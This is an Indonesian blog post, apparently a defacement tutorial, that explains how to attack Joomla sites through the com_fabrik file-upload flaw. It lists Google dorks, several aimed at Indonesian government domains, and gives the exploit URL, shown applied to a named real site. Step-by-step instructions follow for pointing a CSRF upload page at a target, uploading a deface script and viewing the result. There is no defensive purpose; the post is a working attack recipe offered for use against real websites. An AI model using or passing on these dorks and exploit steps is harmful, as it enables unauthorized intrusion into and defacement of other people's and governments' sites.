ASSALAMUALAIKUM WR.WB
Cara Deface Poc Metode Com_Fabrik:
Bahan:
1.Dork:
- inurl:index.php?option=com_fabrik
- inurl:index.php?option=com_fabrik
- inurl:importcsv.php site:go.id
- inurl:index.php/component/fabrik/ site:go.id
- inurl:index.php?option=com_fabrik&view= site:go.id
{ dikembangin lagi ya dorknya}
2.Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
3.CSRF: Comot Disini
4. Script Deface
====================================
{~~~~~~~~~~~____________~~~~~~~~~~~}
{~~~~~~~~~~~____________~~~~~~~~~~~}
1. Copas salah satu dork yang diatas
2. Jika sudah silahkan anda pilih salah satu website dan masukan Exploit dibelakang web target.
Contohnya: https://labsat.cn/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
3. Ciri-ciri website vuln atau perawan itu akan tampil seperti dibawah ini!!!
4. Selanjutnya buka CSRF yang sudah anda download, kemudian edit bagian www.target.com dengan nama website yang akan dieksekusi
5. Kalo sudah di edit jangan lupa disave ya sayangku cintaku preettt :)
6. Setelah itu buka CSRF lewat google Dan upload script deface anda
7. Kalau berhasil diupload maka hasilnya akan seperti ini ya sayangku cintaku -_-
Contoh: {"filepath":"null","uri","http:\/\/https://labsat.cn\/.namascriptanda"}
8. DUARRR!!!
Cara melihatnya: http://www.target.com/namascriptanda.html
Komentar
Posting Komentar